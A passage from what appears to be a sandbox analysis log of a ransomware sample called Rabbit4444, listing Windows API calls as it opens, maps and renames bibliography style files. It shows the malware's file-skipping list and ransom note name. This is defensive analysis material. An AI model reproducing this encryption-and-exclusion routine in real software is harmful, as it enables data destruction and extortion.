[0053.422] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0053.422] lstrlenW (lpString=".lnk") returned 4 [0053.422] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0053.422] lstrlenW (lpString=".ini") returned 4 [0053.422] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0053.422] lstrlenW (lpString=".sys") returned 4 [0053.422] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0053.422] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.423] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.423] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14473335369) returned 1 [0053.423] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=268670) returned 1 [0053.423] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0053.423] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101a68 [0053.423] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x41c80, lpName=0x0) returned 0x298 [0053.425] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x41c80) returned 0x70000 [0053.435] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.435] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0053.435] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.435] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0053.435] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.435] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0053.435] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.435] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0053.435] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14474591466) returned 1 [0053.435] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0053.435] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101a68 | out: hHeap=0xe0000) returned 1 [0053.435] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.439] CloseHandle (hObject=0x298) returned 1 [0053.439] CloseHandle (hObject=0x278) returned 1 [0053.439] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL.Rabbit4444") returned 78 [0053.439] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl.rabbit4444"), dwFlags=0x1) returned 1 [0053.439] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2da7ba7, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2da7ba7, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2120015, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x3e966, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GostName.XSL", cAlternateFileName="")) returned 1 [0053.439] lstrcmpiW (lpString1="GostName.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.439] lstrcmpiW (lpString1="GostName.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.439] lstrcmpiW (lpString1="GostName.XSL", lpString2="Rabbit4444.exe") returned -1 [0053.439] lstrcmpiW (lpString1="GostName.XSL", lpString2=".") returned 1 [0053.439] lstrcmpiW (lpString1="GostName.XSL", lpString2="..") returned 1 [0053.439] lstrcmpiW (lpString1="GostName.XSL", lpString2="windows") returned -1 [0053.439] lstrcmpiW (lpString1="GostName.XSL", lpString2="bootmgr") returned 1 [0053.439] lstrcmpiW (lpString1="GostName.XSL", lpString2="pagefile.sys") returned -1 [0053.440] lstrcmpiW (lpString1="GostName.XSL", lpString2="boot") returned 1 [0053.440] lstrcmpiW (lpString1="GostName.XSL", lpString2="ids.txt") returned -1 [0053.440] lstrcmpiW (lpString1="GostName.XSL", lpString2="NTUSER.DAT") returned -1 [0053.440] lstrcpyW (in: lpString1=0x130ebb2, lpString2="GostName.XSL" | out: lpString1="GostName.XSL") returned="GostName.XSL" [0053.440] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL", dwFileAttributes=0x0) returned 1 [0053.440] lstrlenW (lpString="GostName.XSL") returned 12 [0053.440] lstrlenW (lpString="Rabbit4444") returned 10 [0053.440] lstrcmpiW (lpString1="stName.XSL", lpString2="Rabbit4444") returned 1 [0053.440] lstrlenW (lpString=".dll") returned 4 [0053.440] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0053.440] lstrlenW (lpString=".lnk") returned 4 [0053.440] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0053.440] lstrlenW (lpString=".ini") returned 4 [0053.440] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0053.440] lstrlenW (lpString=".sys") returned 4 [0053.440] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0053.440] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.440] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.440] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14475114340) returned 1 [0053.440] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=256358) returned 1 [0053.440] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0053.441] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0053.441] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3ec70, lpName=0x0) returned 0x298 [0053.442] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3ec70) returned 0x70000 [0053.451] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.451] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0053.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.451] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0053.451] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0053.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0053.451] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14476206167) returned 1 [0053.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0053.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0053.451] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.454] CloseHandle (hObject=0x298) returned 1 [0053.454] CloseHandle (hObject=0x278) returned 1 [0053.454] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL.Rabbit4444") returned 84 [0053.454] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl.rabbit4444"), dwFlags=0x1) returned 1 [0053.455] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2da7ba7, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2da7ba7, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2120015, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x3d639, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GostTitle.XSL", cAlternateFileName="GOSTTI~1.XSL")) returned 1 [0053.455] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.455] lstrcmpiW (lpString1="GostTitle.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.455] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="Rabbit4444.exe") returned -1 [0053.455] lstrcmpiW (lpString1="GostTitle.XSL", lpString2=".") returned 1 [0053.455] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="..") returned 1 [0053.455] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="windows") returned -1 [0053.455] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="bootmgr") returned 1 [0053.455] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="pagefile.sys") returned -1 [0053.455] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="boot") returned 1 [0053.455] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="ids.txt") returned -1 [0053.455] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="NTUSER.DAT") returned -1 [0053.455] lstrcpyW (in: lpString1=0x130ebb2, lpString2="GostTitle.XSL" | out: lpString1="GostTitle.XSL") returned="GostTitle.XSL" [0053.455] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL", dwFileAttributes=0x0) returned 1 [0053.456] lstrlenW (lpString="GostTitle.XSL") returned 13 [0053.456] lstrlenW (lpString="Rabbit4444") returned 10 [0053.456] lstrcmpiW (lpString1="tTitle.XSL", lpString2="Rabbit4444") returned 1 [0053.456] lstrlenW (lpString=".dll") returned 4 [0053.456] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0053.456] lstrlenW (lpString=".lnk") returned 4 [0053.456] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0053.456] lstrlenW (lpString=".ini") returned 4 [0053.456] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0053.456] lstrlenW (lpString=".sys") returned 4 [0053.456] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0053.456] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.456] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.456] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14476689676) returned 1 [0053.456] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=251449) returned 1 [0053.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0053.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0053.456] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d940, lpName=0x0) returned 0x298 [0053.457] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d940) returned 0x70000 [0053.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0053.466] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0053.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.467] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0053.467] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.467] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0053.467] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14477738895) returned 1 [0053.467] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0053.467] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0053.467] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.469] CloseHandle (hObject=0x298) returned 1 [0053.469] CloseHandle (hObject=0x278) returned 1 [0053.469] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL.Rabbit4444") returned 85 [0053.469] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl.rabbit4444"), dwFlags=0x1) returned 1 [0053.470] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2df40d1, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2df40d1, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2788516, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x45882, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HarvardAnglia2008OfficeOnline.xsl", cAlternateFileName="HARVAR~1.XSL")) returned 1 [0053.470] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.470] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.470] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="Rabbit4444.exe") returned -1 [0053.470] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2=".") returned 1 [0053.470] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="..") returned 1 [0053.470] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="windows") returned -1 [0053.470] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="bootmgr") returned 1 [0053.470] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="pagefile.sys") returned -1 [0053.470] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="boot") returned 1 [0053.470] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="ids.txt") returned -1 [0053.470] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="NTUSER.DAT") returned -1 [0053.470] lstrcpyW (in: lpString1=0x130ebb2, lpString2="HarvardAnglia2008OfficeOnline.xsl" | out: lpString1="HarvardAnglia2008OfficeOnline.xsl") returned="HarvardAnglia2008OfficeOnline.xsl" [0053.470] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl", dwFileAttributes=0x0) returned 1 [0053.470] lstrlenW (lpString="HarvardAnglia2008OfficeOnline.xsl") returned 33 [0053.470] lstrlenW (lpString="Rabbit4444") returned 10 [0053.470] lstrcmpiW (lpString1="Online.xsl", lpString2="Rabbit4444") returned -1 [0053.471] lstrlenW (lpString=".dll") returned 4 [0053.471] lstrcmpiW (lpString1=".xsl", lpString2=".dll") returned 1 [0053.471] lstrlenW (lpString=".lnk") returned 4 [0053.471] lstrcmpiW (lpString1=".xsl", lpString2=".lnk") returned 1 [0053.471] lstrlenW (lpString=".ini") returned 4 [0053.471] lstrcmpiW (lpString1=".xsl", lpString2=".ini") returned 1 [0053.471] lstrlenW (lpString=".sys") returned 4 [0053.471] lstrcmpiW (lpString1=".xsl", lpString2=".sys") returned 1 [0053.471] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.471] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.471] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14478169057) returned 1 [0053.471] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=284802) returned 1 [0053.471] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0053.471] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0053.471] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x45b90, lpName=0x0) returned 0x298 [0053.472] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x45b90) returned 0x70000 [0053.481] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.481] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0053.481] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.481] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0053.481] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.481] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0053.481] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.481] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0053.481] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14479217515) returned 1 [0053.481] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0053.482] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0053.482] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.484] CloseHandle (hObject=0x298) returned 1 [0053.484] CloseHandle (hObject=0x278) returned 1 [0053.484] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl.Rabbit4444") returned 105 [0053.484] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl.rabbit4444"), dwFlags=0x1) returned 1 [0053.485] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1a2f1, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e1a2f1, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2cbf800, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IEEE2006OfficeOnline.xsl", cAlternateFileName="IEEE20~1.XSL")) returned 1 [0053.485] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.485] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.485] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="Rabbit4444.exe") returned -1 [0053.485] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2=".") returned 1 [0053.485] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="..") returned 1 [0053.485] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="windows") returned -1 [0053.485] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="bootmgr") returned 1 [0053.485] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="pagefile.sys") returned -1 [0053.485] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="boot") returned 1 [0053.485] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="ids.txt") returned 1 [0053.485] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="NTUSER.DAT") returned -1 [0053.485] lstrcpyW (in: lpString1=0x130ebb2, lpString2="IEEE2006OfficeOnline.xsl" | out: lpString1="IEEE2006OfficeOnline.xsl") returned="IEEE2006OfficeOnline.xsl" [0053.485] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl", dwFileAttributes=0x0) returned 1 [0053.486] lstrlenW (lpString="IEEE2006OfficeOnline.xsl") returned 24 [0053.486] lstrlenW (lpString="Rabbit4444") returned 10 [0053.486] lstrcmpiW (lpString1="Online.xsl", lpString2="Rabbit4444") returned -1 [0053.486] lstrlenW (lpString=".dll") returned 4 [0053.486] lstrcmpiW (lpString1=".xsl", lpString2=".dll") returned 1 [0053.486] lstrlenW (lpString=".lnk") returned 4 [0053.486] lstrcmpiW (lpString1=".xsl", lpString2=".lnk") returned 1 [0053.486] lstrlenW (lpString=".ini") returned 4 [0053.486] lstrcmpiW (lpString1=".xsl", lpString2=".ini") returned 1 [0053.486] lstrlenW (lpString=".sys") returned 4 [0053.486] lstrcmpiW (lpString1=".xsl", lpString2=".sys") returned 1 [0053.486] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.487] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.487] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14479737109) returned 1 [0053.487] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=294525) returned 1 [0053.487] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0053.487] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0053.487] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x48180, lpName=0x0) returned 0x298 [0053.488] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x48180) returned 0x70000 [0053.497] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.497] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0053.497] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.497] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0053.497] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0053.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0053.498] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 